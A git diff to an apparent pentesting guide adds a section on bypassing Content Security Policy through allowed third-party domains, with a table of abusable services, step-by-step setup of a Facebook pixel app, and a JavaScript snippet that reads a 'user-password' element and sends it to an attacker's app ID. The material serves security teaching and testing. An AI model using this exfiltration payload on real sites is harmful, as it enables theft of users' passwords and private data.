Update CSP methods for third parties

pentesting-web/content-security-policy-csp-bypass/README.md

@@ -287,6 +287,53 @@ https://www.youtube.com/oembed?callback=alert;
 
 The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
 
+### Third Party Abuses
+As described in the (following post)[https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses], there are many third party domains, that might be allowed somewhere in the CSP, can be abused to either exfiltrate data or execute JavaScript code. Some of these third-parties are:
+
+| Entity | Allowed Domain | Capabilities |
+|--------|----------------|--------------|
+| Facebook | www.facebook.com, *.facebook.com | Exfil |
+| Hotjar | *.hotjar.com, ask.hotjar.io | Exfil |
+| Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | Exec |
+| Amazon CloudFront | *.cloudfront.net | Exfil, Exec |
+| Amazon AWS | *.amazonaws.com | Exfil, Exec |
+| Azure Websites | *.azurewebsites.net, *.azurestaticapps.net | Exfil, Exec |
+| Salesforce Heroku	| *.herokuapp.com | Exfil, Exec |
+| Google Firebase | *.firebaseapp.com | Exfil, Exec |
+
+If you find any of the allowed domains in the CSP of your target, chances are that you might be able to bypass the CSP by registering on the third-party service and, either exfiltrate data to that service or to execute code.
+
+For example, if you find the following CSP:
+
+```
+Content-Security-Policy​: default-src 'self’ www.facebook.com;​
+```
+
+or 
+
+```
+Content-Security-Policy​: connect-src www.facebook.com;​
+```
+
+You should be able to exfiltrate data, similarly as it has always be done with (Google Analytics)[https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp]/(Google Tag Manager)[https://blog.deteact.com/csp-bypass/]. In this case, you follow these general steps:
+
+1. Create a Facebook Developer account here.
+1. Create a new "Facebook Login" app and select "Website".
+1. Go to "Settings -> Basic" and get your "App ID"
+1. In the target site you want to exfiltrate data from, you can exfiltrate data by directly using the Facebook SDK gadget "fbq" through a "customEvent" and the data payload.
+1. Go to your App "Event Manager" and select the application you created (note the event manager could be found in an URL similar to this: https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events
+1. Select the tab "Test Events" to see the events being sent out by "your" web site.
+
+Then, on the victim side, you execute the following code to initialize the Facebook tracking pixel to point to the attacker's Facebook developer account app-id and issue a custom event like this:
+```JavaScript
+fbq('init', '1179785999289471');​
+fbq('trackCustom', 'My-Custom-Event',{​
+    data: "Secret ingredient is: '"+document.getElementById('user-password').innerText+"'"​
+});
+```
+
+As for the other third-party domains specified in the previous table, there are many other ways you can abuse them. Refer to the previously referred (blog post)[https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses] for additional explanations.
+
 ### Folder path bypass
 
 If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree with that.\